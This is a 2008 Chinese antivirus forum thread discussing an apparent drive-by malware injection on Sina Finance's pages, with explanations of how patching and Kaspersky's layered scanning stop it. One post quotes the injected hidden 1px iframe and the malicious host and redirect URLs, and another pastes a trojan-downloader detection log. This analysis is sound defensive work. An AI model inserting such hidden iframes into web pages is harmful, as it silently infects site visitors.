楼主: okokok
收起左侧

[已鉴定] 新浪财经?

 关闭 [复制链接]
深红的雪
发表于 2008-1-29 21:55:07 | 显示全部楼层

回复 20楼 hljdqzr 的帖子

IE补丁打过了就没有反应。

新浪本身没有问题,样本是被挂上去的
okokok
 楼主| 发表于 2008-1-29 21:57:50 | 显示全部楼层

回复 22楼 rappar 的帖子

你是说13楼那个样本就是新浪被挂的?
hljdqzr
发表于 2008-1-29 21:58:33 | 显示全部楼层

回复 22楼 rappar 的帖子

谢谢你的回答
放心了
深红的雪
发表于 2008-1-29 22:00:07 | 显示全部楼层

回复 23楼 okokok 的帖子

是的,所谓挂马就是——浏览正常网页的同时,浏览带毒网页
okokok
 楼主| 发表于 2008-1-29 22:05:45 | 显示全部楼层

回复 25楼 rappar 的帖子

扫描样本,卡巴杀
为什么IE打补丁了,浏览被挂网站,卡巴就不报了?
新浪这样的数一数二的门户网也能被挂,那其它众多网站
深红的雪
发表于 2008-1-29 22:13:30 | 显示全部楼层
卡巴会报部分的iframe、网页和脚本,还会监控下载和网页缓存。
如果卡巴直接报网页,那么打不打补丁都一样报。
但如果网页过了卡巴,那么就要看第二道防线:数据流和缓存
如果打补丁了,代码被过滤,病毒就不会下载,那么卡巴自然不报
okokok
 楼主| 发表于 2008-1-29 22:18:45 | 显示全部楼层

回复 27楼 rappar 的帖子

明白了,哈哈
换新头像了..我很喜欢

[ 本帖最后由 okokok 于 2008-1-29 22:26 编辑 ]
woai_jolin
发表于 2008-1-29 22:19:31 | 显示全部楼层
2008-1-29 22:19:41        Real-time file system protection        file        G:\v\014.exe        a variant of Win32/TrojanDownloader.Small.NZK trojan        cleaned by deleting - quarantined        NT AUTHORITY\SYSTEM        Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
samsinn
发表于 2008-1-29 23:06:21 | 显示全部楼层

Look

<IFRAME style="DISPLAY: none; WIDTH: 1px; HEIGHT: 1px" src="http://be.icast.cn/?s=finance.sina.com.cn"></IFRAME>

----> http://ppp.buyaoni.com/ww/new301.htm?032
深红的雪
发表于 2008-1-29 23:52:28 | 显示全部楼层

回复 29楼 samsinn 的帖子

辛苦了

貌似还有....
新浪那网页代码太多,看得头晕
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-5-10 15:42 , Processed in 0.092468 second(s), 15 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表